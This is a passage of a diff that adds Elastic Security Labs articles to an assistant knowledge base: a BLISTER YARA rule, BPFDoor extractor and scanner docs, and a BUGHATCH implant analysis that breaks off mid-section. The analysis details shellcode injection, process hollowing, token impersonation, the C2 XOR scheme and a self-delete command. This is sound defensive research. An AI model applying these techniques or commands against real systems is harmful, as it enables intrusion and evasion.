+ os = "Windows"
+ arch = "x86"
+ category_type = "Trojan"
+ family = "BLISTER"
+ threat_name = "Windows.Trojan.BLISTER"
+ description = "Detects BLISTER loader."
+ reference_sample = "afb77617a4ca637614c429440c78da438e190dd1ca24dc78483aa731d80832c2"
+
+ strings:
+ $a1 = { 8D 45 DC 89 5D EC 50 6A 04 8D 45 F0 50 8D 45 EC 50 6A FF FF D7 }
+ $a2 = { 75 F7 39 4D FC 0F 85 F3 00 00 00 64 A1 30 00 00 00 53 57 89 75 }
+ $a3 = { 78 03 C3 8B 48 20 8B 50 1C 03 CB 8B 78 24 03 D3 8B 40 18 03 FB 89 4D F8 89 55 E0 89 45 E4 85 C0 74 3E 8B 09 8B D6 03 CB 8A 01 84 C0 74 17 C1 C2 09 0F BE C0 03 D0 41 8A 01 84 C0 75 F1 81 FA B2 17 EB 41 74 27 8B 4D F8 83 C7 02 8B 45 F4 83 C1 04 40 89 4D F8 89 45 F4 0F B7 C0 3B 45 E4 72 C2 8B FE 8B 45 04 B9 }
+ $b1 = { 65 48 8B 04 25 60 00 00 00 44 0F B7 DB 48 8B 48 ?? 48 8B 41 ?? C7 45 48 ?? ?? ?? ?? 4C 8B 40 ?? 49 63 40 ?? }
+ $b2 = { B9 FF FF FF 7F 89 5D 40 8B C1 44 8D 63 ?? F0 44 01 65 40 49 2B C4 75 ?? 39 4D 40 0F 85 ?? ?? ?? ?? 
65 48 8B 04 25 60 00 00 00 44 0F B7 DB } + condition: + any of them +} +``` + +## References + +- [https://www.elastic.co/blog/elastic-security-uncovers-blister-malware-campaign](https://www.elastic.co/blog/elastic-security-uncovers-blister-malware-campaign) +- [https://www.trendmicro.com/en_us/research/22/d/Thwarting-Loaders-From-SocGholish-to-BLISTERs-LockBit-Payload.html](https://www.trendmicro.com/en_us/research/22/d/Thwarting-Loaders-From-SocGholish-to-BLISTERs-LockBit-Payload.html?utm_source=trendmicroresearch&utm_medium=smk&utm_campaign=0422_Socgholish) +- [https://redcanary.com/threat-detection-report/threats/socgholish/](https://redcanary.com/threat-detection-report/threats/socgholish/) + +## Artifacts + +Artifacts are also available for [download](https://assets.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blte5a55b99e66b4794/628e88d91cd65960bcff2862/blister-indicators.zip) in both ECS and STIX format in a combined zip bundle. diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/bpfdoor_configuration_extractor.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/bpfdoor_configuration_extractor.md new file mode 100644 index 0000000000000..c548827c211f6 --- /dev/null +++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/bpfdoor_configuration_extractor.md @@ -0,0 +1,96 @@ +--- +title: "BPFDoor Configuration Extractor" +slug: "bpfdoor-configuration-extractor" +date: "2022-12-06" +description: "Configuration extractor to dump out hardcoded passwords with BPFDoor." +author: + - slug: elastic-security-labs +image: "tools-image.jpg" +category: + - slug: tools +tags: + - bpfdoor +--- + +Configuration extractor to dump out hardcoded passwords with BPFDoor. + +[Download bpfdoor-config-extractor.tar.gz](https://assets.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt3f57100ade3473c5/62882ccdb4fa6b61ed70ba87/bpfdoor-config-extractor.tar.gz) + +## Overview + +This tool provides a Python module and command line tool that will extract passwords from BPFDoor samples. + +> The Elastic Security Team has released an indepth analysis of the BPFDoor malware and created an additional tool that will scan for BPFDoor infected hosts. +> +> - [BPFDoor analysis](https://bookish-bassoon-c37be003.pages.github.io/intelligence/2022/05/04.bpfdoor/article/) +> - [BPFDoor scanner](https://www.elastic.co/security-labs/bpfdoor-scanner) + +## Getting Started + +### Docker + +We can easily run the extractor with Docker, first we need to build the image. + +``` +Building the BPFDoor Docker image + +docker build . -t bpfdoor-extractor +``` + +Then we run the container with the **-v** flag to map a host directory to the Docker container directory that contains the BPFDoor samples. 
+ +``` +Running the BPFDoor Docker container + +docker run -ti --rm -v $(pwd)/binaries:/binaries \ + bpfdoor-extractor:latest -d /binaries/ +``` + +We can either specify a single sample with **-f** option or a directory of samples with **-d** + +``` +BPFDoor Configuration Extractor help output + +docker run -ti --rm bpfdoor-extractor:latest -h + +Author: Elastic Security (MARE) + +______ ______ ______ ______ +| ___ \| ___ \| ___|| _ \ +| |_/ /| |_/ /| |_ | | | | ___ ___ _ __ +| ___ \| __/ | _| | | | |/ _ \ / _ \ | '__| +| |_/ /| | | | | |/ /| (_) || (_) || | +\____/ \_| \_| |___/ \___/ \___/ |_| + _____ __ _ _____ _ _ +/ __ \ / _|(_) | ___| | | | | +| / \/ ___ _ __ | |_ _ __ _ | |__ __ __| |_ _ __ __ _ ___ | |_ ___ _ __ +| | / _ \ | '_ \ | _|| | / _` | | __|\ \/ /| __|| '__|/ _` | / __|| __|/ _ \ | '__| +| \__/\| (_) || | | || | | || (_| | | |___ > < | |_ | | | (_| || (__ | |_| (_) || | + \____/ \___/ |_| |_||_| |_| \__, | \____//_/\_\ \__||_| \__,_| \___| \__|\___/ |_| + __/ | + |___/ + + +usage: bpfdoor-extractor [-h] (-f FILENAME | -d DIRNAME) + +options: + -h, --help show this help message and exit + -f FILENAME, --file FILENAME + File + -d DIRNAME, --dir DIRNAME + Directory + +``` + +### Running it Locally + +As mentioned above, Docker is the recommended approach to running this project, however you can also run this locally. This project uses [Poetry](https://python-poetry.org/) to manage dependencies, testing, and metadata. If you have Poetry installed already, from this directory, you can simply run the following commands to run the tool. This will setup a virtual environment, install the dependencies, activate the virtual environment, and run the console script. + +``` +poetry lock +poetry install +poetry shell +bpfdoor-extractor --help +``` + +Once that works, you can do the same sort of things as mentioned in the Docker instructions above. diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/bpfdoor_scanner.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/bpfdoor_scanner.md new file mode 100644 index 0000000000000..529435d350f82 --- /dev/null +++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/bpfdoor_scanner.md @@ -0,0 +1,105 @@ +--- +title: "BPFDoor Scanner" +slug: "bpfdoor-scanner" +date: "2022-12-06" +description: "Python script to identify hosts infected with the BPFDoor malware." +author: + - slug: elastic-security-labs +image: "tools-image.jpg" +category: + - slug: tools +tags: + - bpfdoor +--- + +Python script to identify hosts infected with the BPFDoor malware. + +[Download bpfdoor-scanner.tar.gz](https://assets.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltae9bafece9048014/62882b50dcc93261eccb04e2/bpfdoor-scanner.tar.gz) + +## Getting Started + +This tool provides a Python script to identify hosts that are infected with the BPFDoor malware. + +> The Elastic Security Team has released an indepth analysis of the BPFDoor malware and created an additional tool that will extract configurations from BPFDoor malware samples. +> +> - [BPFDoor analysis](https://bookish-bassoon-c37be003.pages.github.io/intelligence/2022/05/04.bpfdoor/article/) +> - [BPFDoor configuration extractor](https://www.elastic.co/security-labs/bpfdoor-configuration-extractor) + +### Permissions + +On Linux (and thus in a container), the tool requires the following permissions: + +- CAP_NET_BIND_SERVICE +- CAP_NET_RAW + +On any \*NIX host, running the script with sudo will get you what you need. 
As long as you don’t strip the privileges listed for your container and you publish the UDP port you intend to receive on, you should be set.
+
+### Docker
+
+We can easily run the scanner with Docker. First, we need to build the image:
+
+```
+Building the BPFDoor scanner Docker image
+
+docker build . -t bpfdoor-scanner
+```
+
+## Usage
+
+Once you’ve built the Docker image, we can run the container to get a list of the options.
+
+```
+Running the BPFDoor container
+
+docker run -ti --rm bpfdoor-scanner:latest --help
+
+Usage: bpfdoor-scanner [OPTIONS]
+
+  Sends a discovery packet to suspected BPFDoor endpoints.
+
+  Example usage:
+
+  sudo ./bpfdoor-scanner --target-ip 1.2.3.4
+
+  Sends a packet to IP 1.2.3.4 using the default target port 68/UDP (tool
+  listens on all ports) using the default interface on this host and listens
+  on port 53/UDP to masquerade as traffic.
+
+  NOTE: Elevated privileges are required for source ports < 1024.
+
+Options:
+  --target-ip TEXT       [required]
+  --target-port INTEGER  [default: 68]
+  --source-ip TEXT       IP for target to respond to and attempt to bind
+                         locally  [default: 172.17.0.3]
+  --source-port INTEGER  Local port to listen on for response  [default: 53]
+  --timeout INTEGER      Number of seconds to wait for response  [default: 5]
+  -v, --verbose          Show verbose output
+  -d, --debug            Show debug output
+  --version
+  --help                 Show this message and exit.
+```
+
+The minimum required option is just --target-ip. The rest have defaults. For running in a container, you’ll want to publish the return port (defaults to 53) and specify --source-ip of the host interface you wish to use. In the following example, the IP 192.168.100.10 is the interface on my host that will receive the packet.
+
+```
+Example running the BPFDoor scanner
+
+docker run -ti --publish 53:53/udp --rm bpfdoor-scanner:latest \
+  --target-ip 192.168.32.18 --source-ip 192.168.100.10
+```
+
+## Running Locally
+
+As mentioned above, Docker is the recommended approach to running this project; however, you can also run it locally. This project uses [Poetry](https://python-poetry.org/) to manage dependencies, testing, and metadata. If you have Poetry installed already, from this directory, you can simply run the following commands to run the tool. This will set up a virtual environment, install the dependencies, activate the virtual environment, and run the console script.
+
+```
+Running BPFDoor scanner locally
+
+poetry lock
+poetry install
+poetry shell
+sudo bpfdoor-scanner --help
+```
+
+Once that works, you can do the same sort of things as mentioned in the Docker instructions above.
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/bughatch_malware_analysis.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/bughatch_malware_analysis.md
new file mode 100644
index 0000000000000..94ccb7e375c5b
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/bughatch_malware_analysis.md
@@ -0,0 +1,528 @@
+---
+title: "BUGHATCH Malware Analysis"
+slug: "bughatch-malware-analysis"
+date: "2022-09-09"
+subtitle: "Malware analysis of the BUGHATCH downloader."
+description: "Elastic Security has performed a deep technical analysis of the BUGHATCH malware. This includes capabilities as well as defensive countermeasures."
+author:
+  - slug: salim-bitam
+image: "libraries-edev-ops-1680x980.jpg"
+category:
+  - slug: malware-analysis
+tags:
+  - bughatch
+  - cuba
+  - ref9019
+---
+
+## Key takeaways
+
+- Elastic Security Labs is releasing a BUGHATCH malware analysis report from a recent [campaign](https://www.elastic.co/security-labs/cuba-ransomware-campaign-analysis)
+- This report covers detailed code analysis, network communication protocols, command handling, and observed TTPs
+- From this research we produced a [YARA rule](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_Bughatch.yar) to detect the BUGHATCH downloader
+
+## Preamble
+
+BUGHATCH is a custom C2 implant deployed during the CUBA ransomware campaigns we observed in February of 2022. This tool was most likely built by the threat actor themselves, as it had not been used previously.
+
+BUGHATCH is capable of downloading and executing commands and arbitrary code. It gives the operator the freedom to execute payloads with different techniques such as reflection, shellcode execution, and system command execution. The samples we have seen were not obfuscated and were deployed using a custom obfuscated in-memory dropper written in PowerShell and referred to as [TERMITE by Mandiant](https://www.mandiant.com/resources/unc2596-cuba-ransomware).
+
+In this document, we will go through the execution flow of BUGHATCH, highlighting its functionalities and code execution techniques; a YARA rule and the MITRE ATT&CK mapping can be found in the appendix.
+
+In this analysis, we will describe the following:
+
+- Token adjustment
+- Information collection
+- Threading and thread synchronization
+- Network communication protocol
+- Command handling
+
+> For information on the CUBA ransomware campaign and associated malware analysis, check out our blog posts detailing this:
+>
+> - [CUBA Ransomware Campaign](https://www.elastic.co/security-labs/cuba-ransomware-campaign-analysis)
+> - [CUBA Malware Analysis](https://www.elastic.co/security-labs/cuba-ransomware-malware-analysis)
+
+## Static analysis
+
+| | |
+| ------------ | ----------------------------------------------------------------- |
+| SHA256 | F1325F8A55164E904A4B183186F44F815693A008A9445D2606215A232658C3CF |
+| File Size | 35840 bytes |
+| File Type | Win32 executable |
+| Signed? | No |
+| Packer? | No |
+| Compiler | Visual Studio 2017 - 15.5.0 preview 2 |
+| Compile Time | Sun Feb 06 21:05:18 2022 UTC |
+| Entropy | 6.109 |
+
+### Sections
+
+| Name | VirtualAddress | Virtual Size | Raw Size | Entropy | MD5 |
+| ------ | -------------- | ------------ | -------- | ------- | -------------------------------- |
+| .text | 0x1000 | 0x6000 | 0x5400 | 5.933 | A6E30CCF838569781703C943F18DC3F5 |
+| .rdata | 0x7000 | 0x3000 | 0x2A00 | 6.217 | 9D9AD1251943ECACE81644A7AC320B3C |
+| .data | 0xA000 | 0x1000 | 0x400 | 1.163 | B983B8EB258220628BE2A88CA44286B4 |
+| .reloc | 0xB000 | 0x424 | 0x600 | 5.235 | 39324A58D79FC5B8910CBD9AFBF1A6CB |
+
+## Code analysis
+
+BUGHATCH is an in-memory implant loaded by an obfuscated PowerShell script that decodes and executes an embedded shellcode blob in its allocated memory space using common Windows APIs (**VirtualAlloc**, **CreateThread**, **WaitForSingleObject**).
+
+The PowerShell loader uses inline C# to load the APIs needed for shellcode injection, as seen in the following pseudocode screenshot.
+ +![Pseudocode PowerShell inline C#](/assets/images/bughatch-malware-analysis/image12.jpg) + +The PowerShell script is obfuscated with random functions and variable names and contains the shellcode in a reverse-Base64 format. + +![Pseudocode embedded shellcode in Base64 format](/assets/images/bughatch-malware-analysis/image10.png) + +The script first decodes the reverse-Base64 encoded data, then allocates a memory region with **VirtualAlloc** before copying the shellcode into it. Finally, the script executes the shellcode by creating a new thread with the **CreateThread** API. + +![Pseudocode PowerShell creates a new thread to execute the shellcode](/assets/images/bughatch-malware-analysis/image38.jpg) + +The shellcode downloads another shellcode blob and the encrypted PE implant from the C2 server, this second shellcode decrypts and reflectively loads the PE malware. + +This section dives deeper into the BUGHATCH execution flow, threading and encryption implementation, communication protocol with C2, and finally supported commands and payload execution techniques implemented. + +The following is a diagram summarizing the execution flow of the implant: + +![Execution flow diagram of BUGHATCH](/assets/images/bughatch-malware-analysis/image16.png) + +![Pseudocode of the main function](/assets/images/bughatch-malware-analysis/image15.jpg) + +### Token adjustment + +The implant starts by elevating permissions using the **SeDebugPrivilege** method, enabling the malware to access and read the memory of other processes. It leverages common Windows APIs to achieve this as shown in the pseudocode below: + +![](/assets/images/bughatch-malware-analysis/image20.jpg) + +### Information collection + +The malware collects host-based information used to fingerprint the infected system, this information will be stored in a custom structure that will be 2-byte XOR encrypted and sent to the C2 server in an HTTP POST request. + +The following lists the collected information: + +- Current value of the performance counter +- Network information +- System information +- Token information +- Domain and Username of the current process +- Current process path + +#### Current value of the performance counter + +Using the **QueryPerformanceCounter** API, it collects the amount of time since the system was last booted. This value will be used to compute the 2-byte XOR encryption key to encrypt communications between the implant and the C2 server, a detailed analysis of the encryption implementation will follow. + +![Pseudocode QueryPerformanceCounter function](/assets/images/bughatch-malware-analysis/image42.jpg) + +#### Network information + +It collects the addresses of network interfaces connected to the infected machine by using the **GetIpAddrTable** Windows API. 
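+
+As a rough point of reference (our sketch, not the implant’s code), an analyst recreating this part of the fingerprint on a test host could approximate the same data from Python; BUGHATCH itself calls **GetIpAddrTable** directly:
+
+```
+import socket
+
+# Approximate the "network information" item of the fingerprint:
+# resolve the local hostname to the addresses bound to its interfaces.
+hostname = socket.gethostname()
+addresses = sorted({info[4][0] for info in socket.getaddrinfo(hostname, None)})
+print(hostname, addresses)
+```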
+ +![Pseudocode collecting interface addresses](/assets/images/bughatch-malware-analysis/image22.jpg) + +#### System information + +BUGHATCH collects key system information which includes: + +- Windows major release, minor release, and build number +- Processor architecture (either 32-bit or 64-bit) +- Computer name + +![Pseudocode collecting system information](/assets/images/bughatch-malware-analysis/image18.jpg) + +#### Token information + +The agent proceeds to collect the current process token group membership, it invokes the **AllocateAndInitializeSid** API followed by the **CheckTokenMembership** API, concatenating the [SDDL SID strings](https://docs.microsoft.com/en-us/windows/win32/secauthz/sid-strings) for every group the process token is part of. While not unique to BUGHATCH, this is detected by Elastic's [Enumeration of Privileged Local Groups Membership](https://www.elastic.co/guide/en/security/current/enumeration-of-privileged-local-groups-membership.html) detection rule. + +![Pseudocode collecting token group membership information](/assets/images/bughatch-malware-analysis/image29.jpg) + +#### Domain and username of the current process + +The malware opens a handle to the current process with **OpenProcessToken** and gets the structure that contains the user account of the token with **GetTokenInformation**. It then retrieves the username and domain of the user account with the **LookupAccountSidW** API and concatenates the 2 strings in the following format: **DOMAIN\USERNAME**. + +![](/assets/images/bughatch-malware-analysis/image14.jpg) + +#### Current process path + +Finally, it collects the current process path with **GetModuleFileNameW**. The malware then encrypts the entire populated structure with a simple 2-byte XOR algorithm, this encryption implementation is detailed later in the report. + +## Threading and thread synchronization + +The implant is multithreaded; it uses two different linked lists, one is filled with the commands received from the C2 server and the other is filled with the output of the commands executed. + +It spawns 5 worker threads, each handling a command received from the C2 server by accessing the appropriate linked list using the **CriticalSection** object. The main process’ thread also retrieves the command's output from the second linked list using the **CriticalSection** object for synchronization purposes, to avoid any race conditions. + +![Pseudocode of the thread creation function](/assets/images/bughatch-malware-analysis/image45.jpg) + +## Network communication protocol + +In this section we will detail: + +- Base communication protocol +- Encryption implementation + +The implant we analyzed uses HTTP(S) for communications. On top of the SSL encryption of the protocol, the malware and C2 encrypt the data with a 2-byte XOR key computed by the malware for each new session. The values to compute the 2-byte XOR key are prepended at the beginning of the base protocol packet which the server extracts to decrypt/encrypt commands. + +When launched, the malware will first send an HTTP POST request to the C2 server containing all the collected information extracted from the victim’s machine, the C2 then responds with the operator’s command if available, or else the agent sleeps for 60 seconds. 
After executing the command and only if the output of the executed command is available, the malware will send a POST request containing both the collected information and the command’s output, otherwise, it sends the collected information and waits for new commands. + +![Example of an implant HTTP POST request to an emulated C2 server](/assets/images/bughatch-malware-analysis/image32.png) + +### Base communication protocol + +The author(s) of BUGHATCH implemented a custom network protocol, the following is the syntax that the agent and server use for their communication: + +![BUGHATCH agent and server communications](/assets/images/bughatch-malware-analysis/BugHatchanalysisreport_html.jpg) + +- **XOR key values:** The values to compute the 2-byte XOR encryption key used to encrypt the rest of the data +- **Separator:** A static value ( **0x389D3AB7** ) that separates **Msg** chunks, example: the server can send different instructions in the same HTTP request separated by the **Separator** +- **Chunk length:** Is the length of the **Msg** , **Separator** and **Chunk length** +- **Msg:** Is the message to be sent, the message differs from the agent to the server. + +We will dive deeper into the encapsulation of the **Msg** for both the agent and the server. + +![Pseudocode extracting commands according to the separator value](/assets/images/bughatch-malware-analysis/image40.jpg) + +### Encryption implementation + +The malware uses 2-byte XOR encryption when communicating with the C&C server; a 2-byte XOR key is generated and computed by the implant for every session with the C2 server. + +The agent uses two DWORD values returned by **QueryPerformanceCounter** API as stated earlier, it then computes a 2-byte XOR key by XOR-encoding the DWORD values and then multiplying and adding hardcoded values. The following is a Python pseudocode of how the KEY is computed: + +``` +tmp = (PerformanceCount[0] ^ PerformanceCount[1]) & 0xFFFFFFFF +XorKey = (0x343FD * tmp + 0x269EC3)& 0xFFFFFFFF +XorKey = p16(XorKey >> 16).ljust(2, b'\x00') +``` + +![Pseudocode of the encryption implementation](/assets/images/bughatch-malware-analysis/image9.jpg) + +## Command handling + +In this section, we will dive deeper into the functionalities implemented in the agent and their respective **Msg** structure that will be encapsulated in the base communication protocol structure as mentioned previously. + +Once the working threads are started, the main thread will continue beaconing to the C2 server to retrieve commands. The main loop is made up of the following: + +- Send POST request +- Decrypt the received command and add it to the linked list +- Sleep for 60 seconds + +A working thread will first execute the **RemoveEntryRecvLinkedList** function that accesses and retrieves the data sent by the C2 server from the linked list. + +![Pseudocode retrieves data sent by the C2](/assets/images/bughatch-malware-analysis/image43.jpg) + +The thread will then de-encapsulate the data received from the C2 and extract the **Msg(Command)**. 
The malware implements different functionalities according to a command flag, the table below illustrates the functionalities of each command: + +| | | +| ------------ | --------------------------------------------------------------------- | +| Command FLAG | Description | +| 1 | Group functions related to code and command execution | +| 2 | Group functions related to utilities like impersonation and migration | +| 3 | Process injection of a PE file in a suspended child process | + +### Command 1 + +This command gives access to functionalities related to payload execution, from DLL to PE executable to PowerShell and cmd scripts. + +Some of the sub-commands use pipes to redirect the standard input/output of the child process, which enables the attacker to execute payloads and retrieve its output, for example, PowerShell or Mimikatz, etc… + +The following is the list of sub commands: + +| | | | +| ---------------- | --------------------------- | ----------------------------------------------------------------------------------------------------------------------------------------- | +| Sub Command Flag | Function Name | Functionality description | +| 2 | ReflectivelyExecutePERemote | Reflectively loads PE files in a child process and redirects its standard input output, the output will be sent to the operator C2 server | +| 3 | DropPEDiskExecute | Drops a PE file to disk and executes it, the execution output is then sent to the operator’s C2 server | +| 4 | SelfShellcodeExecute | Executes a shellcode in the same process | +| 5 | RemoteShellcodeExecute | Executes a shellcode in a suspended spawned child process | +| 6 | ExecuteCmd | Executes a CMD script/command | +| 7 | ExecutePowershell | Executes a Powershell script/command | +| 9 | ReflectivelyLoadDllRemote | Executes a DLL reflectively in a remote process using CreateRemoteThread API | + +The following is the structure that is used by the above commands: + +``` +struct ExecutePayloadCommandStruct +{ + DWORD commandFlag; + DWORD field_0; + DWORD subCommandFlag_1; + DWORD readPipeTimeOut_2; + DWORD payloadSize_3; + DWORD commandLineArgumentSize_4; + DWORD STDINDataSize_5; + CHAR payload_cmdline_stdin[n]; +}; +``` + +- **commandFlag:** Indicates the command +- **subCommandFlag:** Indicates the subcommand +- **readPipeTimeOut:** Indicates the timeout for reading the output of child processes from a pipe +- **payloadSize:** Indicates the payload size +- **commandLineArgumentSize:** Indicates length of the command line arguments when executing the payload, example a PE binary +- **STDINDataSize:** Indicates the length of the standard input data that will be sent to the child process +- **Payload_cmdline_stdin:** Can contain the payload PE file for example, its command line arguments and the standard input data that will be forwarded to the child process, the malware knows the beginning and end of each of these using their respective length. + +#### ReflectivelyExecutePERemote + +The agent reflectively loads PE binaries in the memory space of a created process in a suspended state (either **cmd.exe** or **svchost.exe** ). The agent leverages [anonymous (unnamed) pipes](https://docs.microsoft.com/en-us/windows/win32/ipc/anonymous-pipes) within Windows to redirect the created child process's standard input and output handles. It first creates an anonymous pipe that will be used to retrieve the output of the created process, then the pipe handles are specified in the **STARTUPINFO** structure of the child process. 
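+
+As a high-level analogue (not BUGHATCH’s actual implementation, which uses **CreatePipe**, **CreateProcessA**, and a **STARTUPINFO** structure), the redirect-and-collect idea behind these sub-commands looks like this in Python; the child command line is a hypothetical example:
+
+```
+import subprocess
+
+# Launch a child process with its stdin/stdout attached to pipes,
+# mirroring how the implant wires anonymous pipes into STARTUPINFO.
+child = subprocess.Popen(
+    ["cmd.exe", "/c", "whoami"],      # hypothetical payload command line
+    stdin=subprocess.PIPE,            # operator-supplied STDIN data goes here
+    stdout=subprocess.PIPE,           # read side used to collect the output
+    stderr=subprocess.STDOUT,
+)
+
+try:
+    # Comparable to the readPipeTimeOut field in the command structure above.
+    output, _ = child.communicate(input=b"", timeout=30)
+except subprocess.TimeoutExpired:
+    child.kill()
+    output, _ = child.communicate()
+
+print(output.decode(errors="replace"))
+```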
+ +![Pseudocode for anonymous pipe creation](/assets/images/bughatch-malware-analysis/image41.jpg) + +After creating the suspended process, the malware allocates a large memory block to write shellcode and a XOR encrypted PE file. + +The shellcode will 2-byte XOR decrypt and load the embedded PE similar to ( **Command 3** ). This command can load 64bit and 32bit binaries, each architecture has its own shellcode PE loader, after injecting the shellcode it will point the instruction pointer of the child process’s thread to the shellcode and resume the thread. + +![Pseudocode of Reflective Loading PE into child processes](/assets/images/bughatch-malware-analysis/image2.jpg) + +The following is an example of a packet captured from our custom emulated C2 server, we can see the structure discussed earlier on the left side and the packet bytes on the right side, for each command implemented in the malware, a packet example will be given. + +![Example of a ReflectivelyExecutePERemote command received from an emulated C2](/assets/images/bughatch-malware-analysis/image7.png) + +#### DropPEDiskExecute + +With this subcommand, the operator can drop a PE file on disk and execute it. The agent has 3 different implementations depending on the PE file type, GUI Application, CUI (Console Application), or a DLL. + +For CUI binaries, the malware first generates a random path in the temporary folder and writes the PE file to it using **CreateFileA** and **WriteFile** API. + +![Pseudocode writing payload to disk](/assets/images/bughatch-malware-analysis/image39.jpg) + +It then creates a process of the dropped binary file as a child process by redirecting its standard input and output handles; after execution of the payload the output is sent to the operator’s C2 server. + +For GUI PE binaries, the agent simply writes it to disk and executes it directly with **CreateProcessA** API. + +And lastly, for DLL PE files, the malware first writes the DLL to a randomly generated path in the temporary folder, then uses **c:\windows\system32\rundll32.exe** or **c:\windows\syswow64\rundll32.exe** (depending on the architecture of the DLL) to run either an exported function specified by the operator or the function **start** if no export functions were specified. + +![Pseudocode running the payload dropped by DropPEDiskExecute function](/assets/images/bughatch-malware-analysis/image1.jpg) + +![Example of a SelfShellcodeExecute command received from an emulated C2](/assets/images/bughatch-malware-analysis/image34.png) + +#### SelfShellcodeExecute + +This subcommand tasks the agent to execute shellcode in its own memory space by allocating a memory region using **VirtualAlloc** API and then copying the shellcode to it, the shellcode is executed by creating a thread using **CreateThread** API. + +![Pseudocode of SelfShellcodeExecute command](/assets/images/bughatch-malware-analysis/image37.jpg) + +![Example of a SelfShellcodeExecute command received from an emulated C2](/assets/images/bughatch-malware-analysis/image35.jpg) + +#### RemoteShellcodeExecute + +This sub-command can be used to execute a 32-bit or a 64-bit position independent shellcode in another process memory space. 
Similarly to the **SpawnAgent** subcommand, the malware creates a suspended **svchost.exe** process with the **CreateProcessA** API, allocates a memory region for the shellcode sent by the C2 server with **VirtualAllocEx**, and writes to it with **WriteProcessMemory**. It then sets the suspended thread’s instruction pointer to point to the injected shellcode with **SetThreadContext** and finally resumes the thread with **ResumeThread** to execute the payload.
+
+![Pseudocode writes shellcode to remote process](/assets/images/bughatch-malware-analysis/image26.jpg)
+
+![Pseudocode set EIP of child process using SetThreadContext](/assets/images/bughatch-malware-analysis/image13.jpg)
+
+![Example of a RemoteShellcodeExecute command received from an emulated C2](/assets/images/bughatch-malware-analysis/image23.jpg)
+
+#### ExecuteCmd and ExecutePowershell
+
+An operator can execute PowerShell or CMD scripts on the infected machine. The malware writes the script to a file in the temporary folder with a randomly generated name, as follows: **`TEMP.PS1`** for PowerShell or **`TEMP.CMD`** for a Command shell. The malware then passes parameters to it if specified by the malicious actor and executes it; the malware uses named pipes to retrieve the output of the PowerShell process.
+
+![Pseudocode of ExecuteCmd command](/assets/images/bughatch-malware-analysis/image30.jpg)
+
+![Example of an ExecutePowershell command received from an emulated C2](/assets/images/bughatch-malware-analysis/image8.jpg)
+
+#### ReflectivelyLoadDllRemote
+
+This subcommand reflectively executes a 32-bit or 64-bit DLL in a process created in a suspended state. The following summarizes the execution flow:
+
+- Check if the PE file is a 32 or 64-bit DLL
+- Create a suspended **svchost.exe** process
+- Allocate memory for the DLL, and for the DLL parameter if specified by the C2 command, with the **VirtualAllocEx** API
+- Write the DLL, and the parameter if specified, to the remotely allocated memory with the **WriteProcessMemory** API
+- Create a remote thread to execute the injected DLL with the **CreateRemoteThread** API
+
+![Pseudocode of a ReflectivelyLoadDllRemote command](/assets/images/bughatch-malware-analysis/image19.jpg)
+
+![Example of a ReflectivelyLoadDllRemote command received from an emulated C2](/assets/images/bughatch-malware-analysis/image34.png)
+
+### Command 2
+
+Command 2 has multiple sub-functionalities, as shown in the command table above. According to a subCommandFlag, the malware can perform 6 different operations as follows:
+
+| Sub Command Flag | Function Name         | Functionality description    |
+| ---------------- | --------------------- | ---------------------------- |
+| 1 | ExitProcess | Exit process |
+| 2 | SelfDeleteExitProcess | Self delete and exit process |
+| 3 | SpawnAgent64 | Spawn 64-bit agent |
+| 4 | SpawnAgent32 | Spawn 32-bit agent |
+| 0x1001 | ImpersonateToken | Impersonate explorer |
+| 0x1002 | MigrateC2 | Change C2 config |
+
+The following is the structure that is used by the above commands:
+
+```
+struct ImpersonateReplicateStruct
+{
+  int subCommandFlag;
+  int impersonateExplorerToken;
+  char padding[16];
+  __int16 isParameterSet;
+  WCHAR w_parameters[n];
+};
+```
+
+#### ExitProcess
+
+Calls the **ExitProcess(0)** API to terminate.
+
+![Example of an ExitProcess command received from an emulated C2](/assets/images/bughatch-malware-analysis/image25.png)
+
+#### SelfDeleteExitProcess
+
+The agent gets the PATH of the current process with **GetModuleFileNameA**, executes the following command to self-delete: **cmd.exe /c del FILEPATH \\>\\> NUL** using **CreateProcessA**, and then simply exits the process with **ExitProcess(0)**.
+
+![Example of a SelfDeleteExitProcess command received from an emulated C2](/assets/images/bughatch-malware-analysis/image17.png)
+
+#### SpawnAgent64 and SpawnAgent32
+
+When subcommands 3 or 4 are specified, the malware will spawn another agent on the same machine depending on the subcommand sent by the C2, as shown in the table above.
+
+The malware first retrieves the C2 IP address embedded in it, then makes an HTTP GET request to download a packed agent in shellcode format; in the sample we analyzed, the **/Agent32.bin** URI is for the 32-bit agent and **/Agent64.bin** is for the 64-bit agent.
+
+![Pseudocode spawning another agent](/assets/images/bughatch-malware-analysis/image33.jpg)
+
+The malware then creates a suspended **svchost.exe** process with the **CreateProcessA** API, writes the agent shellcode to the process, sets its instruction pointer to point to the injected shellcode with **SetThreadContext**, and finally resumes the thread with **ResumeThread** to execute the injected payload.
+
+![Example of a SpawnAgent32 command received from an emulated C2](/assets/images/bughatch-malware-analysis/image5.png)
+
+#### ImpersonateToken
+
+This subcommand is specific to process tokens; an attacker can either impersonate the **explorer.exe** token or create a token from credentials (Domain\Username, Password) sent by the C2 to spawn another instance of the current process.
+
+![Pseudocode ImpersonateToken command](/assets/images/bughatch-malware-analysis/image44.jpg)
+
+It will first check whether the current process is running as a local system, local service, or network service account by testing whether the process token is a member of the group with the specified RID (**SECURITY_LOCAL_SYSTEM_RID**, **SECURITY_LOCAL_SERVICE_RID**, or **SECURITY_NETWORK_SERVICE_RID**, respectively).
+
+![Pseudocode check token group membership](/assets/images/bughatch-malware-analysis/image36.jpg)
+
+If the operator specified credentials, the malware will first call **LogonUserW** with the Domain\User and password to create a token, then spawn another instance of the current process with this token.
+
+![Pseudocode LogonUserW to create a token](/assets/images/bughatch-malware-analysis/image24.jpg)
+
